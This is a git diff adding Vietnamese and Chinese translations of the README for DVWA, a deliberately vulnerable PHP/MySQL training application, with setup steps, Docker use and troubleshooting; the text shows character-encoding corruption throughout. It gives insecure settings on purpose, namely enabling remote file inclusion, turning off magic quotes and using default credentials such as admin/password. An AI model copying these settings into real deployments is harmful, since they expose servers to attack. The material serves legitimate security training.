đáēŖm báēŖo ráēąng báēĄn đang cháēĄy phiÃĒn báēŖn code máģ›i nháēĨt táģĢ repo. ĐÃĸy không pháēŖi là báēŖn phÃĄt hành máģ›i nháēĨt, đÃĸy là code máģ›i nháēĨt táģĢ master branch. + +Náēŋu gáģ­i ticket, vui lÃ˛ng gáģ­i ít nháēĨt cÃĄc thông tin sau: + +- Háģ‡ điáģu hành +- 5 dÃ˛ng cuáģ‘i cÚng táģĢ láģ—i mÃĄy cháģ§ web sáēŊ ghi tráģąc tiáēŋp sau khi xáēŖy ra báēĨt káģŗ láģ—i nào báēĄn đang bÃĄo cÃĄo +- Náēŋu đÃŗ là láģ—i xÃĄc tháģąc database, hÃŖy tháģąc hiáģ‡n cÃĄc bÆ°áģ›c trÃĒn và cháģĨp áēŖnh màn hÃŦnh táģĢng bÆ°áģ›c. Gáģ­i nháģ¯ng tháģŠ này cÚng váģ›i áēŖnh cháģĨp màn hÃŦnh cáģ§a pháē§n file cáēĨu hÃŦnh hiáģƒn tháģ‹ ngÆ°áģi dÚng và máē­t kháēŠu database. +- Mô táēŖ đáē§y đáģ§ váģ nháģ¯ng gÃŦ đang xáēŖy ra, nháģ¯ng gÃŦ báēĄn mong đáģŖi sáēŊ xáēŖy ra và nháģ¯ng gÃŦ báēĄn đÃŖ cáģ‘ gáē¯ng làm đáģƒ kháē¯c pháģĨc nÃŗ. + +- - - + +## HÆ°áģ›ng dáēĢn chi tiáēŋt + +Tôi sáēŊ cáģ‘ gáē¯ng táē­p háģŖp máģ™t sáģ‘ video hÆ°áģ›ng dáēĢn tÃŦm hiáģƒu máģ™t sáģ‘ láģ— háģ•ng và cháģ‰ ra cÃĄch phÃĄt hiáģ‡n chÃēng cÅŠng nhÆ° cÃĄch khai thÃĄc chÃēng. ĐÃĸy là nháģ¯ng cÃĄi tôi đÃŖ tháģąc hiáģ‡n cho đáēŋn nay: + +[Finding and Exploiting Reflected XSS](https://youtu.be/V4MATqtdxss) + +- - - + +## SQLite3 SQL Injection + +_Háģ— tráģŖ cho váēĨn đáģ này cÃ˛n háēĄn cháēŋ, trÆ°áģ›c khi nÃĒu ra váēĨn đáģ, vui lÃ˛ng đáēŖm báēŖo ráēąng báēĄn đÃŖ debug, không cháģ‰ Ä‘ÆĄn giáēŖn là "nÃŗ không hoáēĄt đáģ™ng"._ + +Theo máēˇc đáģ‹nh, SQLi và Blind SQLi sáēŊ giao tiáēŋp váģ›i mÃĄy cháģ§ MariaDB/MySQL đưáģŖc web sáģ­ dáģĨng nhÆ°ng thay vào đÃŗ, báēĄn cÃŗ tháģƒ chuyáģƒn sang tháģąc hiáģ‡n kiáģƒm tra SQLi đáģ‘i váģ›i SQLite3. + +Tôi sáēŊ không đáģ cáē­p đáēŋn cÃĄch đáģƒ SQLite3 hoáēĄt đáģ™ng váģ›i PHP, nhÆ°ng nÃŗ sáēŊ là máģ™t trÆ°áģng háģŖp Ä‘ÆĄn giáēŖn là cài đáēˇt package `php-sqlite3` và đáēŖm báēŖo ráēąng nÃŗ đưáģŖc kích hoáēĄt. + +Đáģƒ tháģąc hiáģ‡n chuyáģƒn đáģ•i, cháģ‰ cáē§n cháģ‰nh sáģ­a file cáēĨu hÃŦnh và thÃĒm hoáēˇc cháģ‰nh sáģ­a cÃĄc dÃ˛ng sau: + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +Máēˇc đáģ‹nh nÃŗ xài `database/sqli.db`, náēŋu báēĄn láģĄ mess up, cháģ‰ cáē§n sao chÊp `database/sqli.db.dist` đè lÃĒn. + +CÃĄc tháģ­ thÃĄch hoàn toàn giáģ‘ng váģ›i MySQL, thay vào đÃŗ chÃēng cháģ‰ cháēĄy váģ›i SQLite3. + +- - - + +## 👨‍đŸ’ģ Nháģ¯ng ngÆ°áģi đÃŗng gÃŗp + +CáēŖm ÆĄn táēĨt cáēŖ nháģ¯ng đÃŗng gÃŗp cáģ§a báēĄn và giáģ¯ cho dáģą ÃĄn này đưáģŖc cáē­p nháē­t. :heart: + +Náēŋu báēĄn cÃŗ ÃŊ tÆ°áģŸng, cáēŖi tiáēŋn nào đÃŗ hoáēˇc cháģ‰ Ä‘ÆĄn giáēŖn là muáģ‘n cáģ™ng tÃĄc, báēĄn cÃŗ tháģƒ đÃŗng gÃŗp và tham gia vào dáģą ÃĄn, vui lÃ˛ng gáģ­i PR cáģ§a mÃŦnh. + +

+ + + +

+ +- - - + +## BÃĄo cÃĄo láģ— háģ•ng + +NÃŗi máģ™t cÃĄch ngáē¯n gáģn là LÀN Æ N ĐáģĒNG GáģŦI GÌ HáēžT! + +cáģ¨ KHOáēĸNG Háē°NG NĂM, Máģ˜T ai đÃŗ sáēŊ gáģ­i bÃĄo cÃĄo váģ láģ— háģ•ng mà háģ tÃŦm tháēĨy trong áģŠng dáģĨng, máģ™t sáģ‘ đưáģŖc viáēŋt ráēĨt táģ‘t, đôi khi táģ‘t hÆĄn nháģ¯ng gÃŦ tôi tháēĨy trong cÃĄc bÃĄo cÃĄo pen test cÃŗ tráēŖ phí, máģ™t sáģ‘ cháģ‰ là "báēĄn đang thiáēŋu header kÃŦa báēĄn ÆĄi, hÃŖy tráēŖ tiáģn cho tôi đÃĒ". + +Vào năm 2023, váēĨn đáģ đÃŖ nÃĸng lÃĒn máģ™t táē§m cao máģ›i khi ai đÃŗ quyáēŋt đáģ‹nh yÃĒu cáē§u CVE váģ máģ™t láģ— háģ•ng báēŖo máē­t, háģ đÃŖ nháē­n đưáģŖc [CVE-2023-39848](https://nvd.nist.gov/vuln/detail/CVE-2023-39848). Nhiáģu sáģą cáģ‘ khÃĄ vui nháģ™n đÃŖ xáēŖy ra sau đÃŗ và kha khÃĄ tháģi gian lÃŖng phí đáģƒ sáģ­a láģ—i này. + +áģ¨ng dáģĨng này cÃŗ láģ— háģ•ng và đÃŗ là cáģ‘ ÃŊ. Háē§u háēŋt là nháģ¯ng tài liáģ‡u đưáģŖc ghi chÊp đáē§y đáģ§ mà báēĄn xem qua nhÆ° nháģ¯ng bài háģc, máģ™t sáģ‘ khÃĄc là nháģ¯ng tài liáģ‡u "áēŠn", nháģ¯ng tài liáģ‡u báēĄn cÃŗ tháģƒ táģą tÃŦm tháēĨy. Náēŋu báēĄn tháģąc sáģą muáģ‘n tháģƒ hiáģ‡n káģš năng tÃŦm kiáēŋm cÃĄc tính năng báģ• sung áēŠn cáģ§a mÃŦnh, hÃŖy viáēŋt máģ™t bài đăng trÃĒn blog hoáēˇc táēĄo video vÃŦ cÃŗ tháģƒ cÃŗ nháģ¯ng ngÆ°áģi áģŸ ngoài đÃŗ sáēŊ quan tÃĸm đáēŋn viáģ‡c tÃŦm hiáģƒu váģ chÃēng và cÃĄch báēĄn tÃŦm tháēĨy chÃēng. Náēŋu báēĄn gáģ­i liÃĒn káēŋt cho chÃēng tôi, chÃēng tôi tháē­m chí cÃŗ tháģƒ đưa liÃĒn káēŋt đÃŗ vào pháē§n references. + +## Link + +Trang cháģ§ dáģą ÃĄn: + +_ĐưáģŖc táēĄo ra báģŸi DVWA team_ diff --git a/DVWA/README.zh.md b/DVWA/README.zh.md new file mode 100644 index 00000000..222d2ccf --- /dev/null +++ b/DVWA/README.zh.md @@ -0,0 +1,398 @@ +# įŋģč¯‘ + +įŋģč¯‘īŧš@[inVains](https://github.com/inVains) @[songzy12](https://github.com/songzy12) @[cnskis](https://github.com/cnskis) + +- - - + +# å…ŗäēŽ DAMN VULNERABLE WEB APPLICATIONīŧˆDVWAīŧ‰ + +Damn Vulnerable Web Application (DVWA)(č¯‘æŗ¨īŧšå¯äģĨį›´č¯‘ä¸ēīŧš"č¯Ĩæ­ģįš„"不厉全Webåē”į”¨į¨‹åē)īŧŒæ˜¯ä¸€ä¸Ēįŧ–į åˇŽįš„、易受æ”ģå‡ģįš„ PHP/MySQL Webåē”į”¨į¨‹åēã€‚ 厃įš„ä¸ģčĻį›Žįš„是帎劊äŋĄæ¯åŽ‰å…¨ä¸“业äēē员在合æŗ•įš„įŽ¯åĸƒä¸­īŧŒįģƒäš æŠ€čƒŊ和æĩ‹č¯•åˇĨå…ˇīŧŒå¸ŽåŠŠ Web åŧ€å‘äēē员更åĨŊ地äē†č§ŖåĻ‚äŊ•åŠ åŧē Web åē”į”¨į¨‹åēįš„厉全性īŧŒåšļ帎劊å­Ļį”Ÿå’Œæ•™å¸ˆåœ¨å¯æŽ§įš„æ•™å­ĻįŽ¯åĸƒä¸­äē†č§Ŗ和å­Ļäš  Web 厉全技术。 + +DVWAįš„į›Žįš„是通čŋ‡įŽ€å•æ˜Žäē†įš„į•ŒéĸæĨ**įģƒäš ä¸€äē›æœ€å¸¸č§įš„ Web æŧæ´ž**īŧŒæ‰€įģƒäš įš„æŧæ´žå…ˇæœ‰**不同įš„éšžåēĻįē§åˆĢ**。 č¯ˇæŗ¨æ„īŧŒæ­¤čŊ¯äģļ**存在提į¤ē和无提į¤ēįš„æŧæ´ž**。 čŋ™æ˜¯į‰šæ„ä¸ēæ­ĸ。 我äģŦéŧ“åŠąæ‚¨äžé č‡Ēåˇąįš„čƒŊåŠ›å°č¯•åšļ发įŽ°å°Ŋ可čƒŊ多įš„厉全闎éĸ˜ã€‚ +- - - + +## č­Ļ告īŧ + +DVWA非常厚易čĸĢæ”ģå‡ģīŧ **不čĻå°†å…ļ上äŧ åˆ°æ‚¨įš„äē‘æœåŠĄå™¨ä¸Šå¯šå¤–å…Ŧåŧ€įš„ web 文äģļ多中或äģģäŊ•åœ¨å…ŦįŊ‘中įš„webæœåŠĄå™¨ä¸Š**īŧŒåĻåˆ™æœåŠĄå™¨å¯čƒŊäŧščĸĢæ”ģå‡ģ。 åģē莎äŊŋį”¨č™šæ‹Ÿæœē厉čŖ…DVWAīŧˆåĻ‚[VirtualBox](https://www.virtualbox.org/) 或[VMware](https://www.vmware.com/)īŧ‰īŧŒįŊ‘įģœé…įŊŽä¸ēNATįģ„įŊ‘。在åŽĸæœēīŧˆguest machineīŧ‰ä¸­īŧŒæ‚¨å¯äģĨ下čŊŊåšļ厉čŖ… [XAMPP](https://www.apachefriends.org/) į”¨äŊœæ­åģēDVWAįš„ Web æœåŠĄå’Œæ•°æŽåē“æœåŠĄã€‚ + +### 免č´ŖåŖ°æ˜Ž + +我äģŦ不寚äģģäŊ•äēēäŊŋį”¨æ­¤åē”į”¨į¨‹åē (DVWA) įš„æ–šåŧč´Ÿč´Ŗ。 我äģŦåˇ˛įģæ˜ŽįĄŽäē†åē”į”¨į¨‹åēįš„į›Žįš„īŧŒč¯Ĩį¨‹åēäģĨ及į›¸å…ŗ技术不åē”čĸĢæļ意äŊŋį”¨ã€‚ 我äģŦåˇ˛č­Ļ告åšļ采取į›¸å…ŗæŽĒæ–Ŋé˜ģæ­ĸį”¨æˆˇå°† DVWA 厉čŖ…到į”Ÿäē§įŽ¯åĸƒįš„ Web æœåŠĄå™¨ä¸Šã€‚ åĻ‚果您įš„ Web æœåŠĄå™¨å› åŽ‰čŖ… DVWA 而čĸĢæ”ģå‡ģīŧŒčŋ™ä¸æ˜¯æˆ‘äģŦįš„č´ŖäģģīŧŒč€Œæ˜¯į”ąä¸Šäŧ å’ŒåŽ‰čŖ…厃įš„äēē负č´Ŗ。 + +- - - + +## čŽ¸å¯ + +č¯Ĩ文äģļ是Damn Vulnerable Web Application (DVWA) įš„一部分。 + +Damn Vulnerable Web Application (DVWA)是č‡Ēį”ąčŊ¯äģļīŧšæ‚¨å¯äģĨ栚捎č‡Ēį”ąčŊ¯äģļåŸē金äŧšå‘布įš„ GNU 通į”¨å…Ŧå…ąčŽ¸å¯č¯īŧˆčŽ¸å¯č¯įš„įŦŦ 3 į‰ˆīŧŒæˆ–īŧˆį”ąæ‚¨é€‰æ‹Šįš„īŧ‰äģģäŊ•æ›´éĢ˜į‰ˆæœŦīŧ‰é‡æ–°åˆ†å‘å’Œ/或äŋŽæ”šã€‚ + +Damn Vulnerable Web Application (DVWA) įš„发布是ä¸ēäē†å¸Œæœ›åŽƒæœ‰į”¨īŧŒäŊ†ä¸īŧˆå¯š"有į”¨æ€§"īŧ‰åšäģģäŊ•äŋč¯īŧ› į”šč‡ŗ不寚可销唎性īŧˆMERCHANTABILITYīŧ‰æˆ–针寚į‰šåŽšį›Žįš„įš„适į”¨æ€§īŧˆFITNESS FOR A PARTICULAR PURPOSEīŧ‰įš„做äģģäŊ•æš—į¤ēäŋč¯ã€‚ 有å…ŗ更多č¯Ļįģ†äŋĄæ¯īŧŒč¯ˇå‚阅 GNU 通į”¨å…Ŧå…ąčŽ¸å¯č¯ã€‚ + +您åē”č¯Ĩåˇ˛įģåœ¨Damn Vulnerable Web Application (DVWA)中æ”ļ到一äģŊGNU通į”¨å…Ŧå…ąčŽ¸å¯č¯å‰¯æœŦ。 åĻ‚æžœæ˛Ąæœ‰īŧŒč¯ˇå‚阅 。 + +- - - + +## å›Ŋ际化 + +č¯Ĩ文äģļ有多į§č¯­č¨€į‰ˆæœŦīŧš + +- č‹ąæ–‡īŧš[English](README.md) + +åĻ‚果您æƒŗč´ĄįŒŽįŋģč¯‘īŧŒč¯ˇæäē¤ PR。 äŊ†æ˜¯č¯ˇæŗ¨æ„īŧŒčŋ™åšļ不意å‘ŗį€åĒ是įŽ€å•įš„通čŋ‡č°ˇæ­Œįŋģč¯‘æœŦ文æĄŖåšļ提äē¤īŧŒčŋ™į§æäē¤å°†čĸĢ拒įģæŽĨ受。 + +- - - + +## 下čŊŊ + +č™Ŋį„ļ有各į§į‰ˆæœŦįš„ DVWAīŧŒäŊ†å”¯ä¸€å—支持įš„į‰ˆæœŦ是æĨč‡Ē厘斚 GitHub 存储äģ“åē“īŧˆrepositoryīŧ‰įš„最新æēį ã€‚ äŊ å¯äģĨäģŽ repo 中克隆厃īŧš + +``` +git clone https://github.com/digininja/DVWA.git +``` + +æˆ–č€… [下čŊŊ ZIP 文äģļ](https://github.com/digininja/DVWA/archive/master.zip)。 + +- - - + +## 厉čŖ… + +### 厉čŖ…视éĸ‘ + +- [在 kali 下įš„ VirtualBox 中厉čŖ…DVWA](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [在 Windows 10 上厉čŖ…DVWA](https://www.youtube.com/watch?v=cak2lQvBRAo) [12分39į§’] + +### Windows + XAMPP æ–šåŧ + +åĻ‚æžœæ‚¨æ˛Ąæœ‰é…įŊŽ web æœåŠĄå™¨īŧŒé‚Ŗ䚈厉čŖ… DVWA 最įŽ€å•įš„æ–šæŗ•å°ąæ˜¯ä¸‹čŊŊåšļ厉čŖ… [XAMPP](https://www.apachefriends.org/) + +XAMPP 可äģĨ非常斚äžŋåŋĢæˇįš„在 Linux, Solaris, Windows and Mac OS X 上厉čŖ…Apache WEB æœåŠĄå™¨īŧŒ XAMPP 中包åĢäē† Apache web æœåŠĄå™¨, MySQL数捎åē“, PHPįŽ¯åĸƒ, PerlįŽ¯åĸƒ, 一ä¸Ē FTP æœåŠĄå™¨ 和 phpMyAdminæœåŠĄ. + +XAMPP 可äģĨ在äģĨ下地址下čŊŊ: + + +åĒ需čĻč§Ŗ压 dvwa.zip, į„ļ后将č§Ŗ压后įš„æ–‡äģļ攞到XAMPPįš„ web æœåŠĄæ–‡äģļ多中, į„ļ后į”¨æĩč§ˆå™¨æ‰“åŧ€: `http://127.0.0.1/dvwa/setup.php` + +### 配įŊŽæ–‡äģļ + +DVWA 附å¸Ļäē†ä¸€ä¸Ēį¤ē例配įŊŽæ–‡äģļīŧŒéœ€čĻæ šæŽåŽžé™…įŽ¯åĸƒå¤åˆļ一äģŊč¯Ĩ文äģļåšļäŋŽæ”šã€‚ 比åĻ‚在 Linux įŽ¯åĸƒįš„ DVWA čˇ¯åž„ä¸‹īŧŒ 可äģĨį›´æŽĨæ‰§čĄŒå‘Ŋäģ¤: + +`cp config/config.inc.php.dist config/config.inc.php` + +在 Windows įŗģįģŸä¸Š,操äŊœįŗģįģŸå¯čƒŊéģ˜čŽ¤éšč—äē†åŽįŧ€åīŧŒį¨åžŽæœ‰į‚šéēģįƒĻīŧŒåĻ‚果不įĄŽåŽšæ˜¯ä¸æ˜¯éšč—äē†åŽįŧ€åīŧŒå¯äģĨå‚č€ƒä¸‹éĸįš„博åŽĸ: + +[在 Windows 上昞į¤ē文äģļ后įŧ€å](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### Linux čŊ¯äģļ包 + +åĻ‚果您äŊŋį”¨įš„是 Debian 操äŊœįŗģįģŸ, 您需čĻåŽ‰čŖ…äģĨ下依čĩ–čŊ¯äģļ包 _(æˆ–č€…å…ļäģ–čƒŊ厞įŽ°į›¸åŒåŠŸčƒŊįš„)_: + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php php-mysqli +- php-gd + +我äģŦåģēčŽŽåœ¨åŽ‰čŖ…䚋前čŋ›čĄŒæ›´æ–°īŧŒčŋ™æ ˇå¯äģĨįĄŽäŋåŽ‰čŖ…įš„éƒŊ是最新į‰ˆæœŦ。 + +下éĸ是更新和厉čŖ…䞝čĩ–įš„å‘Ŋäģ¤īŧš + +``` +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` + +DVWA éģ˜čŽ¤äŊŋį”¨MySQL数捎åē“č€Œä¸æ˜¯ MariaDB 数捎åē“īŧŒäŊ†æ˜¯æˆ‘äģŦåŧēįƒˆæŽ¨čäŊŋį”¨ MariaDB 数捎åē“īŧŒå› ä¸ēMariaDB数捎åē“无需éĸå¤–配įŊŽåŧ€įŽąåŗį”¨īŧŒMySQL 需čĻæ‰‹åŠ¨é…įŊŽæ‰čĄŒã€‚ + +### 数捎åē“配įŊŽ + +配įŊŽæ•°æŽåē“垈įŽ€å•, 在ä¸ģčœå•ä¸Šå•å‡ģ `Setup DVWA`, į„ļ后单å‡ģ `Create / Reset Database`. įŗģįģŸäŧšåˆ›åģē / 重įŊŽ 数捎åē“åšļ插å…Ĩå…ļäģ–数捎。 + +åĻ‚果在创åģē数捎åē“įš„æ—ļ候æŠĨ错, åŠĄåŋ…įĄŽäŋåœ¨ `./config/config.inc.php` 中įš„配įŊŽäŋĄæ¯æ˜¯æ­ŖįĄŽįš„。 *不同äēŽ config.inc.php.dist, åŽč€…åĒ是į¤ēäž‹æ–‡äģļīŧŒč¯ˇæ šæŽåŽžé™…情å†ĩčŋ›čĄŒé…įŊŽã€‚* + +č¯Ĩ文äģļįš„éģ˜čŽ¤é…įŊŽåĻ‚下: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +有一į‚ščĻæŗ¨æ„īŧŒåĻ‚果您į”¨įš„是 MariaDB č€Œä¸æ˜¯ MySQL (Kali中éģ˜čŽ¤æ˜¯ MariaDB ), é‚Ŗ䚈您将无æŗ•åœ¨æ•°æŽåē“中äŊŋį”¨rootį”¨æˆˇ, 您åŋ…éĄģ创åģē一ä¸Ē新įš„数捎åē“į”¨æˆˇ. 因此, 需čĻå…ˆį”¨rootį”¨æˆˇį™ģåŊ•æ•°æŽåē“īŧŒį„ļåŽæ‰§čĄŒäģĨ下å‘Ŋäģ¤: + +```mysql +mysql> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +mysql> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +mysql> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +mysql> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### å…ļäģ–配įŊŽ + +栚捎您įš„操äŊœįŗģįģŸäģĨ及PHPį‰ˆæœŦį­‰īŧŒäŋŽæ”šéģ˜čŽ¤é…įŊŽäģĨčžžåˆ°éœ€æą‚īŧŒå› įŽ¯åĸƒä¸åŒīŧŒé…įŊŽæ–‡äģļįš„äŊįŊŽäšŸæ˜¯ä¸åŒįš„。 + +**文äģļ多权限**: + +* `./hackable/uploads/` - 需čĻæŽˆäēˆ web æœåŠĄå¯å†™æƒé™ (į”¨äŊœå­˜å‚¨ä¸Šäŧ įš„æ–‡äģļ). +* `./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt` - 需čĻæŽˆäēˆ web æœåŠĄå¯å†™æƒé™ (åĻ‚果您æƒŗäŊŋį”¨PHPIDSįš„č¯). + +**PHP 配įŊŽ**: + +* `allow_url_include = on` - å…čŽ¸åŒ…åĢčŋœį¨‹æ–‡äģļ (RFI) [[启į”¨url-include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] +* `allow_url_fopen = on` - å…čŽ¸čŋœį¨‹čŽŋ问īŧˆå°ąæ˜¯č¯ˇæą‚httpīŧ‰ (RFI) [[启į”¨url-fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] +* `safe_mode = off` - (åĻ‚æžœ PHP į‰ˆæœŦ <= v5.4) å…čŽ¸SQLæŗ¨å…Ĩ (SQLi) [[åŽ‰å…¨æ¨Ąåŧ](https://secure.php.net/manual/en/features.safe-mode.php)] +* `magic_quotes_gpc = off` - (åĻ‚æžœ PHP į‰ˆæœŦ <= v5.4) å…čŽ¸SQLæŗ¨å…Ĩ (SQLi) [[魔术åŧ•åˇ](https://secure.php.net/manual/en/security.magicquotes.php)] +* `display_errors = off` - (可选) 不昞į¤ēPHPč­Ļ告æļˆæ¯ [[å…ŗé—­é”™č¯¯æ˜žį¤ē](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + +**`config/config.inc.php` 文äģļ配įŊŽ**: + +* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - čŋ™é‡Œįš„å€ŧ可äģĨ在此įŊ‘址į”Ÿæˆ: https://www.google.com/recaptcha/admin/create + +### éģ˜čŽ¤į”¨æˆˇä¸Žå¯†į  + +**éģ˜čŽ¤į”¨æˆˇ = `admin`** + +**éģ˜čŽ¤å¯†į  = `password`** + +_...垈厚易čĸĢį ´č§Ŗ ;)_ + +į™ģåŊ•åœ°å€: http://127.0.0.1/login.php + +_æŗ¨æ„: 栚捎DVWA厞际厉čŖ…äŊįŊŽč‡ĒčĄŒč°ƒæ•´ã€‚_ + +- - - + +## Docker 厚器配įŊŽ + +_čŋ™ä¸€éƒ¨åˆ†č¯´æ˜Žį”ą @thegrims æˇģ加īŧŒæœ‰å…ŗDockerįš„é—Žéĸ˜æˆ–支持īŧŒč¯ˇč”įŗģäģ–äģŦ或 @opsxcqīŧŒäģ–是Docker映像和repoįš„įģ´æŠ¤č€…。äģģäŊ•é—Žéĸ˜éƒŊ可čƒŊäŧščĸĢ指向此处åšļč§Ŗå†ŗ _ + +- [dockerhub 地址](https://hub.docker.com/r/vulnerables/web-dvwa/) +`docker run --rm -it -p 80:80 vulnerables/web-dvwa` + +į”ąäēŽäģĨ前įš„MySQL问éĸ˜īŧŒč¯ˇįĄŽäŋæ‚¨æ­Ŗ在äŊŋį”¨ aufs 。 æ‰§čĄŒ `docker info` å‘Ŋäģ¤čŋ›čĄŒæŖ€æŸĨ。 åĻ‚果不是 aufs, č¯ˇæ”šä¸ē aufsīŧŒ 每ä¸Ē操äŊœįŗģįģŸéƒŊ有äŋŽæ”šįš„æ–šæŗ•īŧŒä¸”各ä¸ĒåˇŽåŧ‚čžƒå¤§īŧŒæ­¤å¤„不做čĩ˜čŋ°ã€‚ + +- - - + +## å¸¸č§é—Žéĸ˜ + +čŋ™äē›é—Žéĸ˜ä¸Žč§Ŗå†ŗæ–šæŗ•æ˜¯čŽ¤ä¸ēäŊ åœ¨åŸēäēŽDebianįš„å‘čĄŒį‰ˆä¸Šé…įŊŽįš„DVWAīŧŒæ¯”åĻ‚DebianīŧŒUbuntu和Kali。寚äēŽå…ļäģ–å‘čĄŒį‰ˆīŧŒå¤§åŒå°åŧ‚īŧŒäŊ†æ˜¯éœ€čĻæ šæŽåŽžé™…情å†ĩčŋ›čĄŒäŋŽæ”šã€‚ + +### 打åŧ€įŊ‘įĢ™ 404 Not Found + +åĻ‚果遇到äē†čŋ™ä¸Ē问éĸ˜īŧŒéĻ–先需čĻįŸĨ道文äģļ所在äŊįŊŽã€‚ éģ˜čŽ¤æƒ…å†ĩ下Apache WEB æœåŠĄįš„įŊ‘įĢ™æ šį›ŽåŊ•äŊäēŽ `/var/www/html`. 比åĻ‚īŧŒæ”žä¸€ä¸Ēæĩ‹č¯•æ–‡äģļ `hello.txt` 到č¯Ĩį›ŽåŊ•, é‚Ŗ䚈在æœŦæœēæĩč§ˆå™¨čŽŋ问 `http://localhost/hello.txt` å°ąå¯äģĨįœ‹åˆ°č¯Ĩ文äģļįš„内厚。 + +比åĻ‚å°†č¯Ĩ文äģļ攞在 - `/var/www/html/mydir/hello.txt` - é‚Ŗ么需čĻåœ¨įŊ‘址后加上文äģļ多名īŧŒåĻ‚īŧš `http://localhost/mydir/hello.txt`. + +Linux įŗģįģŸæ˜¯å¤§å°å†™æ•æ„Ÿįš„īŧŒåĻ‚果按下éĸįš„地址čŽŋ问īŧŒéƒŊäŧšæį¤ē `404 Not Found`: + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +čŋ™å¯š DVWA 有äŊ•åŊąå“īŧŸå¤§éƒ¨åˆ†äēēéƒŊ是į›´æŽĨį”¨ git 将DVWA 克隆到 `/var/www/html`, é‚Ŗ䚈此æ—ļ DVWA įš„į›ŽåŊ•ä¸ēīŧš `/var/www/html/DVWA/` čŋ™é‡Œéĸ包åĢäē† DVWA 所有įš„æ–‡äģļ. æ­¤æ—ļčŽŋ问 `http://localhost/` å°ąäŧšæį¤ē `404` æˆ–č€…æ˜¯Apacheįš„éģ˜čŽ¤æŦĸčŋŽéĄĩéĸ。 像čŋ™į§æƒ…å†ĩīŧŒéœ€čĻå°†čŽŋ问įŊ‘址攚ä¸ēīŧš `http://localhost/DVWA`. + +čŋ˜æœ‰ä¸€į§å¸¸č§é”™č¯¯æ˜¯åœ¨čŽŋ问 `http://localhost/dvwa` æ—ļ也äŧšæŠĨ `404` 因ä¸ēLinux大小写敏感īŧŒčŽ¤ä¸ē `dvwa` 与 `DVWA` 是两ä¸Ē不同įš„čˇ¯åž„ 。 + +所äģĨ在厉čŖ…厌äģĨ后, åĻ‚果打åŧ€įŊ‘įĢ™æį¤ē `404`, æŖ€æŸĨ文äģļ是不是在 web æœåŠĄå™¨įš„įŊ‘įĢ™æ šį›ŽåŊ•ä¸‹īŧŒį„ļ后įĄŽåŽšå¤§å°å†™æ˜¯åĻæ­ŖįĄŽã€‚ + +### 厉čŖ…中提į¤ē "Access denied" + +åĻ‚果在厉čŖ…čŋ‡į¨‹ä¸­æį¤ē Access denied īŧŒč¯ˇæŖ€æŸĨ配įŊŽæ–‡äģļ中įš„数捎åē“č´Ļåˇå¯†į æ˜¯åĻæ­ŖįĄŽ: + +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +č¯Ĩé”™č¯¯æį¤ēæ­Ŗ在äŊŋį”¨įš„数捎åē“į”¨æˆˇåä¸ēīŧšnotdvwa + +下éĸįš„é”™č¯¯æį¤ē无æŗ•čŽŋ闎数捎åē“īŧŒåžˆå¯čƒŊ是数捎åē“配įŊŽé”™äē†ã€‚ + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +č¯´æ˜Žæ­Ŗ在äŊŋį”¨ dvwa į”¨æˆˇčŽŋ问 notdvwa数捎åē“īŧŒäŊ†æ˜¯čŽŋ问čĸĢ拒įģã€‚ + +éĻ–å…ˆįĄŽåŽšé…įŊŽæ–‡äģļ是存在įš„。 + +åĻ‚果文äģļįĄŽåŽžå­˜åœ¨īŧŒé‚Ŗ䚈在å‘Ŋäģ¤čĄŒä¸‹æŖ€æŸĨ一下īŧŒ 比åĻ‚į”¨æˆˇåä¸ēīŧš `dvwa` 密į ä¸ēīŧš `p@ssw0rd`, é‚Ŗäšˆæ‰§čĄŒäģĨ下å‘Ŋäģ¤: + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +*æŗ¨: 参数-p后éĸæ˛Ąæœ‰įŠēæ ŧ* + +åĻ‚æžœįœ‹åˆ°äģĨ下提į¤ēäŋĄæ¯īŧŒé‚Ŗäšˆč¯´æ˜Žč´Ļåˇå¯†į æ˜¯æ­ŖįĄŽįš„: + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +在å‘Ŋäģ¤čĄŒä¸­čŋ›čĄŒčŋžæŽĨ是æ­Ŗ常įš„, é‚Ŗ么问éĸ˜å¯čƒŊå‡ē在配įŊŽæ–‡äģļ上, 再äģ”įģ†æŖ€æŸĨ一遍配įŊŽæ–‡äģļīŧŒįœ‹įœ‹æ˜¯ä¸æ˜¯å¯äģĨäŊŋį”¨īŧŒåĻ‚æžœčŋ˜ä¸čĄŒīŧŒå†æissue。 + +åĻ‚æžœįœ‹åˆ°äģĨ下提į¤ēäŋĄæ¯īŧŒč¯´æ˜ŽåŊ“前äŊŋį”¨įš„č´Ļåˇå¯†į ä¸æ­ŖįĄŽã€‚ 重新čŋ›čĄŒ [数捎åē“配įŊŽ](#database-setup) 